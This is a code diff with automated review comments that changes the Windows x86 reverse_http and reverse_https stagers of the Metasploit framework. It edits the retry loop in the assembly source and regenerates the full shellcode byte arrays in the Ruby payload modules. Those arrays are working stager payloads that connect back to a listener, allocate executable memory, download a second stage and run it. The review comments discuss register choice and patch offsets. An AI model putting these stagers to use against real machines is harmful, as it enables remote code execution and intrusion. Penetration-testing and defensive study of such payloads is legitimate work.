diff --git a/external/source/shellcode/windows/x86/src/block/block_reverse_http.asm b/external/source/shellcode/windows/x86/src/block/block_reverse_http.asm
index 3d6cb2c1c0..20c4f643e6 100644
--- a/external/source/shellcode/windows/x86/src/block/block_reverse_http.asm
+++ b/external/source/shellcode/windows/x86/src/block/block_reverse_http.asm
@@ -75,7 +75,7 @@ got_server_uri:
 set_retry:
 push byte 0x10
- pop ecx
+ pop edi
 send_request:
@@ -110,7 +110,8 @@ httpsendrequest:
 jnz short allocate_memory
 try_it_again:
- loopnz send_request
+ dec edi
+ jnz send_request
 ; if we didn't allocate before running out of retries, fall through to
 ; failure
diff --git a/modules/payloads/stagers/windows/reverse_http.rb b/modules/payloads/stagers/windows/reverse_http.rb
index dc2095c32d..505f889864 100644
--- a/modules/payloads/stagers/windows/reverse_http.rb
+++ b/modules/payloads/stagers/windows/reverse_http.rb
@@ -33,11 +33,11 @@ module Metasploit3
 },
 'Payload' =>
- # Built on Tue Feb 4 09:05:59 2014
+ # Built on Tue Feb 4 11:36:42 2014
 # Name: stager_reverse_http
- # Length: 316 bytes
+ # Length: 317 bytes
 # LEPort Offset: 180
- # ExitFunk Offset: 237
+ # ExitFunk Offset: 238
 "\xFC\xE8\x86\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
 "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
 "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
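Review bot: The retry counter now lives in edi, but the only record of why it moved off ecx is the register name itself, and the next edit to this block will be tempted to put it back or to reuse edi inside the loop. A one-line comment at the `pop` would pin the contract: `pop edi              ; retries left (0x10); kept in edi so it survives the API calls in send_request, unlike ecx`. That ecx was being clobbered by the intervening call stubs is an inference from the change, not something this hunk shows — the send_request body lies between this hunk and the next, outside both.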
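Review bot: `dec edi` / `jnz send_request` fixes more than the register choice, and that reasoning is not written down anywhere in the hunk. The old `loopnz` was reached only through the fall-through of `jnz short allocate_memory`, which happens with ZF set, and `loopnz` does not iterate when ZF is set — so on that path the stager gave up after the first failed allocation attempt regardless of the count in ecx. I would comment the new lines: `dec edi          ; retries left; ZF now comes from edi, not from the eax test above` and `jnz send_request ; loopnz never looped here: ZF is set on the fall-through path`. Whether the 0x10 retries fire back-to-back depends on the loop body, which sits between the two hunks outside this one, so treat the absence of a delay as a question rather than a finding.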
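Review bot: `# ExitFunk Offset: 238` moves the exit-function patch point by one byte, but no hunk in this diff touches the hash closed by the `},` immediately above it — presumably the module's `'Offsets'` table, which is what the framework actually uses to patch EXITFUNC (and LPORT, which stays at 180) into the blob. If that entry still reads 237, the regenerated payload gets its EXITFUNC value written one byte early and the comment is the only thing that moved; please confirm the Offsets entry was updated outside this hunk, or derive it from the same build output so the two cannot drift. The bytes themselves are consistent with the asm change: `\x6A\x10\x5F` (push 0x10 / pop edi) replaces `\x6A\x10\x59` (pop ecx), and `\x4F\x75\xED` (dec edi / jnz) replaces `\xE0\xEE` (loopnz), which accounts for the one-byte growth.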
@@ -49,15 +49,16 @@ module Metasploit3
 "\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x89\x5D\x68\x6E\x65" +
 "\x74\x00\x68\x77\x69\x6E\x69\x54\x68\x4C\x77\x26\x07\xFF\xD5\x31" +
 "\xDB\x53\x53\x53\x53\x53\x68\x3A\x56\x79\xA7\xFF\xD5\x53\x53\x6A" +
- "\x03\x53\x53\x68\x5C\x11\x00\x00\xEB\x39\x50\x68\x57\x89\x9F\xC6" +
- "\xFF\xD5\x53\x68\x00\x02\x60\x84\x53\x53\x53\xEB\x28\x53\x50\x68" +
- "\xEB\x55\x2E\x3B\xFF\xD5\x96\x6A\x10\x59\x53\x53\x53\x53\x56\x68" +
- "\x2D\x06\x18\x7B\xFF\xD5\x85\xC0\x75\x17\xE0\xEE\x68\xF0\xB5\xA2" +
- "\x56\xFF\xD5\xEB\x42\xE8\xD3\xFF\xFF\xFF\x2F\x31\x32\x33\x34\x35" +
- "\x00\x6A\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x53\x68\x58" +
- "\xA4\x53\xE5\xFF\xD5\x93\x53\x53\x89\xE7\x57\x68\x00\x20\x00\x00" +
- "\x53\x56\x68\x12\x96\x89\xE2\xFF\xD5\x85\xC0\x74\xBF\x8B\x07\x01" +
- "\xC3\x85\xC0\x75\xE5\x58\xC3\xE8\x7E\xFF\xFF\xFF"
+ "\x03\x53\x53\x68\x5C\x11\x00\x00\xEB\x3A\x50\x68\x57\x89\x9F\xC6" +
+ "\xFF\xD5\x53\x68\x00\x02\x60\x84\x53\x53\x53\xEB\x29\x53\x50\x68" +
+ "\xEB\x55\x2E\x3B\xFF\xD5\x96\x6A\x10\x5F\x53\x53\x53\x53\x56\x68" +
+ "\x2D\x06\x18\x7B\xFF\xD5\x85\xC0\x75\x18\x4F\x75\xED\x68\xF0\xB5" +
+ "\xA2\x56\xFF\xD5\xEB\x42\xE8\xD2\xFF\xFF\xFF\x2F\x31\x32\x33\x34" +
+ "\x35\x00\x6A\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x53\x68" +
+ "\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x53\x89\xE7\x57\x68\x00\x20\x00" +
+ "\x00\x53\x56\x68\x12\x96\x89\xE2\xFF\xD5\x85\xC0\x74\xBF\x8B\x07" +
+ "\x01\xC3\x85\xC0\x75\xE5\x58\xC3\xE8\x7D\xFF\xFF\xFF"
+
 }
 ))
diff --git a/modules/payloads/stagers/windows/reverse_https.rb b/modules/payloads/stagers/windows/reverse_https.rb
index ae8312b43c..7c7d449b8f 100644
--- a/modules/payloads/stagers/windows/reverse_https.rb
+++ b/modules/payloads/stagers/windows/reverse_https.rb
@@ -33,11 +33,11 @@ module Metasploit3
 },
 'Payload' =>
- # Built on Tue Feb 4 09:05:59 2014
+ # Built on Tue Feb 4 11:36:42 2014
 # Name: stager_reverse_https
- # Length: 336 bytes
+ # Length: 337 bytes
 # LEPort Offset: 180
- # ExitFunk Offset: 257
+ # ExitFunk Offset: 258
 "\xFC\xE8\x86\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
 "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
 "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
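Review bot: Same concern as the HTTP sibling — `# ExitFunk Offset: 258` shifts the patch point by one byte, yet no hunk in this diff touches the hash closed by the `},` just above (presumably the `'Offsets'` table the framework patches EXITFUNC from), so if its entry still says 257 the value lands one byte early in the regenerated blob. LPORT staying at 180 is consistent with the growth occurring later in the payload, where `\x6A\x10\x5F` and `\x4F\x75\xD9` replace the `pop ecx` / `loopnz` encoding. Please confirm the Offsets entry was updated outside this hunk, or generate both the comment and the table from the same build step.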
@@ -49,16 +49,17 @@ module Metasploit3
 "\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x89\x5D\x68\x6E\x65" +
 "\x74\x00\x68\x77\x69\x6E\x69\x54\x68\x4C\x77\x26\x07\xFF\xD5\x31" +
 "\xDB\x53\x53\x53\x53\x53\x68\x3A\x56\x79\xA7\xFF\xD5\x53\x53\x6A" +
- "\x03\x53\x53\x68\x5C\x11\x00\x00\xEB\x4D\x50\x68\x57\x89\x9F\xC6" +
- "\xFF\xD5\x53\x68\x00\x32\xE0\x84\x53\x53\x53\xEB\x3C\x53\x50\x68" +
- "\xEB\x55\x2E\x3B\xFF\xD5\x96\x6A\x10\x59\x68\x80\x33\x00\x00\x89" +
+ "\x03\x53\x53\x68\x5C\x11\x00\x00\xEB\x4E\x50\x68\x57\x89\x9F\xC6" +
+ "\xFF\xD5\x53\x68\x00\x32\xE0\x84\x53\x53\x53\xEB\x3D\x53\x50\x68" +
+ "\xEB\x55\x2E\x3B\xFF\xD5\x96\x6A\x10\x5F\x68\x80\x33\x00\x00\x89" +
 "\xE0\x6A\x04\x50\x6A\x1F\x56\x68\x75\x46\x9E\x86\xFF\xD5\x53\x53" +
- "\x53\x53\x56\x68\x2D\x06\x18\x7B\xFF\xD5\x85\xC0\x75\x17\xE0\xDA" +
- "\x68\xF0\xB5\xA2\x56\xFF\xD5\xEB\x42\xE8\xBF\xFF\xFF\xFF\x2F\x31" +
- "\x32\x33\x34\x35\x00\x6A\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40" +
- "\x00\x53\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x53\x89\xE7\x57\x68" +
- "\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xE2\xFF\xD5\x85\xC0\x74" +
- "\xBF\x8B\x07\x01\xC3\x85\xC0\x75\xE5\x58\xC3\xE8\x6A\xFF\xFF\xFF"
+ "\x53\x53\x56\x68\x2D\x06\x18\x7B\xFF\xD5\x85\xC0\x75\x18\x4F\x75" +
+ "\xD9\x68\xF0\xB5\xA2\x56\xFF\xD5\xEB\x42\xE8\xBE\xFF\xFF\xFF\x2F" +
+ "\x31\x32\x33\x34\x35\x00\x6A\x40\x68\x00\x10\x00\x00\x68\x00\x00" +
+ "\x40\x00\x53\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x53\x89\xE7\x57" +
+ "\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xE2\xFF\xD5\x85\xC0" +
+ "\x74\xBF\x8B\x07\x01\xC3\x85\xC0\x75\xE5\x58\xC3\xE8\x69\xFF\xFF" +
+ "\xFF"
 }
 ))